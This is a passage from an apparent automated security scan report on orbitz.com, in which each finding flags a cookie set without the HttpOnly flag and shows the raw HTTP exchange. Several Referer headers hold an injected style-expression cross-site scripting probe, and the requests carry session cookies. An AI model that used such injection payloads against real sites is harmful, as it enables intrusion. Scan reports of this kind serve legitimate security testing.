Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "a54-49ad5c2473240"
Content-Type: application/x-javascript
ntCoent-Length: 2644
Server: Apache
Date: Wed, 02 Feb 2011 16:04:27 GMT
Age: 11083
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 2644

// script.aculo.us scriptaculous.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Permission is hereby granted, fr
...[SNIP]...

12.719. http://www.orbitz.com/shared/js/lib/scriptaculous/src/slider.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/slider.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/scriptaculous/src/slider.js HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "27d2-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 10194
Server: Apache
Date: Wed, 02 Feb 2011 16:04:33 GMT
Age: 11090
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 10194

// script.aculo.us slider.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Marty Haught, Thomas Fuchs
//
// script.aculo.us is freely distributable under the terms of an MIT-style
...[SNIP]...

12.720. http://www.orbitz.com/shared/js/lib/scriptaculous/src/sound.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/sound.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/scriptaculous/src/sound.js HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "772-49ad5c2473240"
Content-Type: application/x-javascript
ntCoent-Length: 1906
Server: Apache
Date: Wed, 02 Feb 2011 16:04:32 GMT
Age: 10772
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 1906

// script.aculo.us sound.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Based on code created by Jules Gravinese
...[SNIP]...

12.721. http://www.orbitz.com/shared/js/tracking/webtrends.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/tracking/webtrends.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/tracking/webtrends.js HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296342267897:ss=1296342267897; OSC=265DA875C314B0C54855FC80AB1B1D8C; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660
If-None-Match: "4830-49a4d1593a700"
If-Modified-Since: Thu, 20 Jan 2011 20:36:12 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "4830-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 18480
Server: Apache
Date: Wed, 02 Feb 2011 16:04:25 GMT
Age: 11642
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 18480




<!-- Added firefox code, DCSClear, setDCSVa
...[SNIP]...

12.722. http://www.orbitz.com/shared/js/vendor/tealeaf.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/vendor/tealeaf.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/vendor/tealeaf.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "156cd-49ad5c2473240"
Content-Type: application/x-javascript
ntCoent-Length: 87757
Server: Apache
Date: Wed, 02 Feb 2011 16:04:25 GMT
Age: 11490
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 87757

/*
* Copyright . 1999-2010 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
* BUT NOT LIMITED
...[SNIP]...

12.723. http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/pagedef/content/air/max_passenger_popup.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=A599324D1A99DFF87A6A633D25322E7F; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/pagedef/content/air/max_passenger_popup.jsp?popupsDisabled=true HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.724. http://www.orbitz.com/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=A102EF34DBF26087ED0E8433788F9228; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp?plusThree=true&botId=aph HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.725. http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/pagedef/content/legal/lowFarePromise.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=86AEB0323B18FBAB0DADEB251B027ED7; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/pagedef/content/legal/lowFarePromise.jsp?popupsDisabled=true HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.726. http://www.orbitz.com/shop/hotelsearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shop/hotelsearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C11231%7C+%7C%26%26HE; Expires=Thu, 03-Mar-2011 15:23:54 GMT; Path=/
myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____11231_2_1_1_1%7D; Expires=Wed, 01-Feb-2012 15:24:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/hotels/?z=4fae&r=1o
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; adRotator=true; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; mbox=check#true#1296573897|session#1296573790873-999455#1296575697; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573874088:ss=1296573790782

Response

12.727. http://www.orbitz.com/site/js/jsAllTeaLeaf.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/site/js/jsAllTeaLeaf.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/js/jsAllTeaLeaf.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296342267897:ss=1296342267897; OSC=265DA875C314B0C54855FC80AB1B1D8C; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660
If-None-Match: "7af37-49a4d22738d00"
If-Modified-Since: Thu, 20 Jan 2011 20:39:48 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:43:15 GMT
ETag: "7b0fa-49ad5cecb8ac0"
Content-Type: application/x-javascript
ntCoent-Length: 504058
Server: Apache
Date: Wed, 02 Feb 2011 16:05:43 GMT
Age: 11723
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 504058

/*
* Copyright . 1999-2010 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
* BUT NOT LIMITED
...[SNIP]...

12.728. http://www.orbitz.com/tealeaf.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/tealeaf.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e34fb045525d5f4f58455e445a4a4217b9;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tealeaf.jsp HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Origin: http://www.orbitz.com
X-TeaLeaf-Page-Cui-Bytes: 2081
X-TeaLeaf-Page-Cui-Events: 6
X-TeaLeaf-Page-Dwell: 36413
X-TeaLeaf-Page-Render: 16969
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT; BeforeUnload
X-TeaLeaf-Page-Url: /App/PerformMDLPDealsContent
X-TeaLeaf-Browser-Res: 3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
